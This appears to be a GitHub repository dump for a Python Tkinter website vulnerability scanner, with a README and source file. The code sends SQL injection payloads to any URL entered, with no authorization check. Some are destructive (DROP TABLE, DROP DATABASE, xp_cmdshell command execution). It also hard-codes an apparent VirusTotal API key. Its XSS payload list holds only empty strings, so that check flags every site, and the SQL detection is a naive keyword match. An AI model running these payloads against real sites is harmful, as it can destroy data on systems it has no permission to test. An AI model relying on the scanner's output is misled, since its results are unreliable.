├── GUI.png ├── output.png ├── README.md └── bestversion.py /GUI.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Illusivehacks/Link-vulnaribility-scanner-/HEAD/GUI.png -------------------------------------------------------------------------------- /output.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Illusivehacks/Link-vulnaribility-scanner-/HEAD/output.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 🌐 Advanced Website Vulnerability Scanner 2 | 3 | ![GUI Preview](GUI.png) 4 | 5 | ## 🚀 About the Project 6 | 7 | The **Advanced Website Vulnerability Scanner** is a comprehensive tool that allows users to analyze websites for potential vulnerabilities. It provides insights into website security by: 8 | - Testing for **SQL Injection** and **Cross-Site Scripting (XSS)** vulnerabilities. 9 | - Fetching and displaying full **HTML** and **JavaScript** code. 10 | - Checking URLs against **VirusTotal** for threat detection. 11 | 12 | Designed with a modern and aesthetic **Tkinter GUI**, this tool is user-friendly and accessible to security enthusiasts and professionals. 13 | 14 | --- 15 | 16 | ## 🎯 Features 17 | 18 | 1. **Vulnerability Scanning**: Detect potential SQL Injection and XSS vulnerabilities. 19 | 2. **Code Analysis**: View and analyze full HTML and JavaScript of the target website. 20 | 3. **VirusTotal Integration**: Check URLs against the VirusTotal API for a detailed threat analysis. 21 | 4. **Result Management**: Save scan results locally for further review. 22 | 5. **Clear and Intuitive UI**: A sleek, responsive interface for effortless navigation. 23 | 24 | --- 25 | 26 | ## 💻 How It Works 27 | 28 | 1. Enter the URL you want to analyze. 29 | 2. Click the **Analyze** button to begin scanning. 30 | 3. View results in the scrollable text area, including: 31 | - Detected vulnerabilities. 32 | - Threat details from VirusTotal. 33 | - Full HTML and JavaScript code. 34 | 35 | 4. Save results to a text file or clear the interface for a new scan. 36 | 37 | --- 38 | 39 | ## 📸 Screenshots 40 | 41 | ### 1️⃣ **Graphical User Interface (GUI)** 42 | ![GUI Screenshot](GUI.png) 43 | 44 | ### 2️⃣ **Output Results** 45 | ![Output Results](output.png) 46 | 47 | --- 48 | 49 | ## 🛠️ Installation 50 | 51 | 1. Clone the repository: 52 | ```bash 53 | git clone https://github.com/Illusivehacks/Link-vulnaribility-scanner-.git 54 | 2. Navigate to the project directory: 55 | bash 56 | ```cd ``` 57 | 3. Install the required dependencies: 58 | bash 59 | ```pip install -r requirements.txt``` 60 | 4.Run the application: 61 | bash 62 | ```python bestversion.py``` 63 | 64 | 65 | 66 | 🔑 Configuration 67 | Replace the default VirusTotal API key in the code with your own: 68 | python 69 | ```DEFAULT_API_KEY = "your_virustotal_api_key"``` 70 | 71 | ⚙️ Requirements 72 | Python 3.8 or later 73 | Required Python libraries: requests, beautifulsoup4, tkinter 74 | 75 | 🛡️ Disclaimer 76 | This tool is designed for educational and ethical hacking purposes only. Always obtain proper authorization before testing the security of any website. 77 | 78 | 🤝 Contributing 79 | Contributions are welcome! Feel free to: Mpesa express- 07438444 80 | 81 | Submit issues. 82 | Fork the repository and create pull requests. 83 | Suggest new features or improvements. 84 | 85 | 📄 License 86 | This project is licensed under the MIT License. See the LICENSE file for more details. 87 | 88 | 📧 Contact 89 | For questions or support, reach out to williamkitungo@gmail.com 90 | 91 | vbnet 92 | ```Let me know if you need further adjustments or additions to the README!``` 93 | 94 | 95 | 96 | 97 | 98 | 99 | -------------------------------------------------------------------------------- /bestversion.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from bs4 import BeautifulSoup 3 | import tkinter as tk 4 | from tkinter import messagebox, scrolledtext, filedialog 5 | import re 6 | 7 | # Default VirusTotal API key (replace with your actual key) 8 | DEFAULT_API_KEY = "bfc2592ad157d3450b1026f849876da871aa40486df24b0550c5719a96ca4ab8" 9 | 10 | # Predefined lists of SQL Injection and XSS payloads 11 | SQL_PAYLOADS = [ 12 | "' OR '1'='1", "' OR 1=1 --", "' OR 1=1#", "' OR 'a'='a", "' OR 'x'='x' --", 13 | "' OR 'x'='x' /*", "' OR 1=1#", "' OR 1=1;", "' OR 1=1--", "admin' --", 14 | "'; DROP TABLE users; --", "' OR 1=1; --", "' OR 'x' = 'x'; --", "1' UNION SELECT null, username, password FROM users --", 15 | "' UNION SELECT null, username, password FROM users --", "'; SELECT * FROM users --", "'; EXEC xp_cmdshell('dir') --", 16 | "'; SELECT * FROM information_schema.tables --", "'; EXEC xp_cmdshell('net user') --", "'; SELECT 1 FROM dual --", 17 | "' OR 1=1 LIMIT 1; --", "' OR 1=1; SELECT SLEEP(5) --", "' OR 1=1 GROUP BY CONCAT(username, 0x3a, password) --", 18 | "1' AND 1=1", "1' OR sleep(5) --", "' AND 1=1#", "'; SHOW TABLES --", "' OR 1=1; DROP DATABASE test --" 19 | ] 20 | 21 | XSS_PAYLOADS = [ 22 | "", "", "", 23 | "", "", 24 | "", "", 25 | "Click me", "", 26 | "", "
", "", 27 | "", "
", 28 | "", "Link", 29 | "", "
Test
", 30 | "", "", 31 | "", "", 32 | "Click", "
" 33 | ] 34 | 35 | # Function to fetch and display the entire HTML and JavaScript 36 | def fetch_full_code(link): 37 | try: 38 | response = requests.get(link, timeout=10, headers={'User-Agent': 'FullCodeFetcher/1.0'}) 39 | response.raise_for_status() 40 | 41 | # Parse HTML content 42 | soup = BeautifulSoup(response.text, 'html.parser') 43 | 44 | # Extract inline and external JavaScript 45 | scripts = soup.find_all('script') 46 | js_code = [] 47 | 48 | for script in scripts: 49 | if script.string: # Inline JavaScript 50 | js_code.append(f"Inline Script:\n{script.string.strip()}") 51 | elif script.get('src'): # External JavaScript 52 | external_src = script['src'] 53 | try: 54 | external_response = requests.get(external_src if "http" in external_src else f"{link}/{external_src}", timeout=10) 55 | external_response.raise_for_status() 56 | js_code.append(f"External Script ({external_src}):\n{external_response.text.strip()}") 57 | except requests.exceptions.RequestException as e: 58 | js_code.append(f"External Script ({external_src}): Error fetching script - {e}") 59 | 60 | # Combine all JavaScript into a single string 61 | js_code_combined = "\n\n".join(js_code) 62 | 63 | return response.text, js_code_combined 64 | except requests.exceptions.RequestException as e: 65 | return None, f"Error fetching the full code: {e}" 66 | 67 | # Function to test for vulnerabilities 68 | def test_vulnerabilities(link): 69 | try: 70 | vulnerabilities = [] 71 | highlighted_vulnerabilities = [] 72 | 73 | # Test SQL injection with each SQL payload 74 | for sql_payload in SQL_PAYLOADS: 75 | test_url = f"{link}?test={sql_payload}" 76 | response = requests.get(test_url, timeout=10, headers={'User-Agent': 'VulnerabilityScanner/1.0'}) 77 | if "SQL syntax" in response.text or "mysql" in response.text.lower() or "database" in response.text.lower(): 78 | vulnerabilities.append("Possible SQL Injection vulnerability detected.") 79 | highlighted_vulnerabilities.append(f"SQL Payload: {sql_payload} detected in response.") 80 | 81 | # Test XSS with each XSS payload 82 | for xss_payload in XSS_PAYLOADS: 83 | test_url = f"{link}?test={xss_payload}" 84 | response = requests.get(test_url, timeout=10, headers={'User-Agent': 'VulnerabilityScanner/1.0'}) 85 | if xss_payload in response.text: 86 | vulnerabilities.append("Possible Cross-Site Scripting (XSS) vulnerability detected.") 87 | highlighted_vulnerabilities.append(f"XSS Payload: {xss_payload} detected in response.") 88 | 89 | # Ensure two return values: vulnerabilities and highlighted_vulnerabilities 90 | if not highlighted_vulnerabilities: 91 | highlighted_vulnerabilities = ["null"] # Indicating null if no vulnerabilities found 92 | 93 | return vulnerabilities if vulnerabilities else ["null"], highlighted_vulnerabilities 94 | except requests.exceptions.RequestException as e: 95 | return [f"Error testing vulnerabilities: {e}"], ["null"] 96 | 97 | # Function to check the URL with VirusTotal 98 | def check_virustotal(link, api_key): 99 | try: 100 | url = "https://www.virustotal.com/api/v3/urls" 101 | headers = {"x-apikey": api_key} 102 | data = {"url": link} 103 | 104 | # Submit URL for analysis 105 | response = requests.post(url, headers=headers, data=data) 106 | response.raise_for_status() 107 | analysis_id = response.json()["data"]["id"] 108 | 109 | # Retrieve scan results 110 | result_url = f"https://www.virustotal.com/api/v3/analyses/{analysis_id}" 111 | scan_response = requests.get(result_url, headers=headers) 112 | scan_response.raise_for_status() 113 | scan_data = scan_response.json() 114 | 115 | # Extract threat detection summary 116 | stats = scan_data["data"]["attributes"]["stats"] 117 | 118 | # Safely get last_analysis_results, handling cases where it may not be present 119 | vendor_info = scan_data["data"]["attributes"].get("last_analysis_results", {}) 120 | 121 | # Formatting the vendor info with details and coloring 122 | vendor_details = "" 123 | if vendor_info: 124 | for vendor, details in vendor_info.items(): 125 | vendor_details += f"{vendor} - {details['category']} (last detected: {details.get('date', 'N/A')})\n" 126 | else: 127 | vendor_details = "No analysis results available." 128 | 129 | return ( 130 | f"VirusTotal Threat Detection:\n" 131 | f"Harmless: {stats['harmless']}, Malicious: {stats['malicious']}, " 132 | f"Suspicious: {stats['suspicious']}, Undetected: {stats['undetected']}\n\n" 133 | f"Vendor Detection Details:\n{vendor_details}" 134 | ) 135 | except Exception as e: 136 | return f"Error checking VirusTotal: {e}" 137 | 138 | # Tkinter GUI 139 | def create_gui(): 140 | def analyze_url(): 141 | link = url_entry.get().strip() 142 | if not link: 143 | messagebox.showwarning("Input Error", "Please enter a URL!") 144 | return 145 | 146 | # Fetch full HTML and JavaScript 147 | html_code, js_code = fetch_full_code(link) 148 | if not html_code: 149 | result_text.delete(1.0, tk.END) 150 | result_text.insert(tk.END, js_code) 151 | return 152 | 153 | # Check vulnerabilities and VirusTotal 154 | vulnerabilities, highlighted_vulnerabilities = test_vulnerabilities(link) 155 | threat_info = check_virustotal(link, DEFAULT_API_KEY) 156 | 157 | # Display results in the GUI 158 | result_text.delete(1.0, tk.END) 159 | result_text.insert(tk.END, "Full HTML Code:\n") 160 | result_text.insert(tk.END, html_code[:5000] + "\n\n" if len(html_code) > 5000 else html_code) 161 | 162 | result_text.insert(tk.END, "\nJavaScript Code:\n") 163 | result_text.insert(tk.END, js_code[:5000] + "\n\n" if len(js_code) > 5000 else js_code) 164 | 165 | result_text.insert(tk.END, "\nVulnerability Analysis:\n") 166 | for vulnerability in vulnerabilities: 167 | result_text.insert(tk.END, f"- {vulnerability}\n") 168 | 169 | if highlighted_vulnerabilities != ["null"]: 170 | result_text.insert(tk.END, "\nHighlighted Vulnerabilities:\n") 171 | for highlight in highlighted_vulnerabilities: 172 | result_text.insert(tk.END, f" {highlight}\n") 173 | else: 174 | result_text.insert(tk.END, "\nHighlighted Vulnerabilities: null\n") 175 | 176 | result_text.insert(tk.END, f"\n{threat_info}\n") 177 | 178 | def clear_all(): 179 | url_entry.delete(0, tk.END) 180 | result_text.delete(1.0, tk.END) 181 | 182 | def save_results(): 183 | result_content = result_text.get(1.0, tk.END) 184 | if result_content.strip(): 185 | file_path = filedialog.asksaveasfilename(defaultextension=".txt", filetypes=[("Text files", "*.txt")]) 186 | if file_path: 187 | with open(file_path, 'w') as file: 188 | file.write(result_content) 189 | else: 190 | messagebox.showwarning("No Content", "No results to save!") 191 | 192 | # Main Tkinter window 193 | root = tk.Tk() 194 | root.title("Advanced Website Vulnerability Scanner") 195 | root.geometry("1200x800") 196 | root.configure(bg="black") 197 | 198 | # URL input 199 | tk.Label(root, text="Enter URL:", fg="white", bg="black").pack(pady=5) 200 | url_entry = tk.Entry(root, width=80, bg="gray", fg="black") 201 | url_entry.pack(pady=5) 202 | 203 | # Frame for buttons 204 | button_frame = tk.Frame(root, bg="black") 205 | button_frame.pack(pady=10) 206 | 207 | # Buttons in horizontal arrangement 208 | analyze_button = tk.Button(button_frame, text="Analyze", command=analyze_url, bg="gray", fg="black") 209 | analyze_button.pack(side=tk.LEFT, padx=10) 210 | 211 | clear_button = tk.Button(button_frame, text="Clear", command=clear_all, bg="gray", fg="black") 212 | clear_button.pack(side=tk.LEFT, padx=10) 213 | 214 | save_button = tk.Button(button_frame, text="Save", command=save_results, bg="gray", fg="black") 215 | save_button.pack(side=tk.LEFT, padx=10) 216 | 217 | # Result display 218 | result_text = scrolledtext.ScrolledText(root, width=140, height=40, bg="black", fg="white", insertbackground="white") 219 | result_text.pack(pady=10) 220 | 221 | # Run Tkinter loop 222 | root.mainloop() 223 | 224 | # Run GUI 225 | if __name__ == "__main__": 226 | create_gui() 227 | --------------------------------------------------------------------------------